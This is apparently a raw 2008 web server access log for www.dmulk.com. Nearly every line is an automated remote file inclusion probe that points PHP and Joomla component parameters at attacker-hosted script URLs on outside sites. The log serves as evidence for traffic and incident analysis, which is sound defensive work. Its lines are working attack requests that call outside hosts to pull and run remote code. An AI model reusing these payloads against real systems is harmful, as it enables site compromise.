70.38.54.118 - - [10/Nov/2008:09:18:05 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:18:05 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:18:10 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:09:18:10 -0800] "GET /logs/access_080730.log//modules/vwar/admin/admin.php?vwar_root=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:18:11 -0800] "GET /logs/access_080606.log/joomla/index.php?option=com_restaurante&task=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
220.232.237.122 - - [10/Nov/2008:09:18:12 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.232.237.122 - - [10/Nov/2008:09:18:12 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.66.76.50 - - [10/Nov/2008:09:18:14 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:18:24 -0800] "GET /logs/access_080710.log/oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:09:18:26 -0800] "GET /logs/access_080710.log/oneadmin/newspublish//include.php?path[docroot]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:18:26 -0800] "GET /logs/access_080116.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:18:26 -0800] "GET /logs/access_071111.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:18:26 -0800] "GET /logs//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:18:27 -0800] "GET /index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94737 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:18:27 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:09:18:28 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:09:18:30 -0800] "GET /logs/access_080730.log///vwar/backup/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:09:18:33 -0800] "GET //vwar/backup/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.157.142.47 - - [10/Nov/2008:09:18:35 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
190.196.2.205 - - [10/Nov/2008:09:18:35 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.157.142.47 - - [10/Nov/2008:09:18:35 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:09:18:55 -0800] "GET /logs/access_080708.log/display.php?page=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.166.200 - - [10/Nov/2008:09:19:00 -0800] "GET /logs/access_080116.log%20%20//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:19:05 -0800] "GET /logs/access_080116.log%20%20//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:19:10 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.35.146.224 - - [10/Nov/2008:09:19:10 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.16.107 - - [10/Nov/2008:09:19:12 -0800] "GET /skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.16.107 - - [10/Nov/2008:09:19:12 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:19:15 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:19:15 -0800] "GET /logs//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:19:16 -0800] "GET /logs/access_080612.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:19:16 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:19:17 -0800] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:19:17 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:19:17 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:19:18 -0800] "GET /logs/access_080116.log%20%20//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:09:19:19 -0800] "GET /logs/access_080319.log//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:19:21 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:19:21 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
125.246.154.68 - - [10/Nov/2008:09:19:21 -0800] "GET /skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [10/Nov/2008:09:19:21 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:19:24 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:19:27 -0800] "GET /logs/access_080606.log/joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
200.93.147.155 - - [10/Nov/2008:09:19:28 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [10/Nov/2008:09:19:28 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [10/Nov/2008:09:19:28 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [10/Nov/2008:09:19:29 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 200 94737 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.72.255 - - [10/Nov/2008:09:19:31 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
84.234.72.255 - - [10/Nov/2008:09:19:32 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
84.234.72.255 - - [10/Nov/2008:09:19:32 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
84.234.72.255 - - [10/Nov/2008:09:19:32 -0800] "GET /logs/access_080606.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:19:36 -0800] "GET /logs/access_080730.log//modules/vwar/admin/admin.php?vwar_root=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:19:51 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:19:51 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:19:54 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:19:55 -0800] "GET /logs/access_080606.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:20:00 -0800] "GET /logs/access_071111.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:20:00 -0800] "GET /logs/access_080116.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:20:00 -0800] "GET /logs//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:20:01 -0800] "GET /index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94721 "-" "Mozilla/5.0" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:20:03 -0800] "GET /logs/access_071111.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:20:04 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:20:04 -0800] "GET /logs/access_080116.log%20%20//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:20:04 -0800] "GET /logs/access_071111.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:20:04 -0800] "GET /logs//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:20:04 -0800] "GET /logs/access_080116.log//index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:20:05 -0800] "GET /index.php?seite=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94705 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:20:05 -0800] "GET /logs/access_080127.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:20:09 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:20:12 -0800] "GET /logs/access_071111.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:20:12 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:20:17 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.16 - - [10/Nov/2008:09:20:19 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [10/Nov/2008:09:20:19 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:20:34 -0800] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
202.157.142.47 - - [10/Nov/2008:09:20:35 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:20:35 -0800] "GET /logs/access_080730.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.157.142.47 - - [10/Nov/2008:09:20:35 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:20:37 -0800] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:20:40 -0800] "GET /logs/access_080116.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:20:44 -0800] "GET /logs/access_080116.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:20:56 -0800] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:09:20:58 -0800] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:09:20:58 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:09:20:58 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:09:20:59 -0800] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:09:21:00 -0800] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:09:21:00 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:09:21:00 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:21:00 -0800] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:21:03 -0800] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:09:21:04 -0800] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:21:06 -0800] "GET /logs/access_080523.log/index.php?incl=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:21:07 -0800] "GET /index.php?incl=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 200 94695 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.38.16.107 - - [10/Nov/2008:09:21:09 -0800] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.16.107 - - [10/Nov/2008:09:21:10 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.fundraising4charity.org.uk/unisaber/index.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:21:10 -0800] "GET /logs/access_080725.log/index.php?incl=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:21:11 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:21:11 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:21:11 -0800] "GET /logs/access_080606.log/joomla/index.php?option=com_restaurante&task=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.231.42.152 - - [10/Nov/2008:09:21:15 -0800] "GET /logs/access_070927.log/index.php?p=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.72.255 - - [10/Nov/2008:09:21:20 -0800] "GET /logs/access_080603.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:21:22 -0800] "GET /logs/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 73021 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:21:22 -0800] "GET /?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94809 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.142.10 - - [10/Nov/2008:09:21:24 -0800] "GET /logs/errors.php?error=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:21:24 -0800] "GET /logs/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 73021 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:21:24 -0800] "GET /?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94809 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.142.10 - - [10/Nov/2008:09:21:26 -0800] "GET /errors.php?error=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
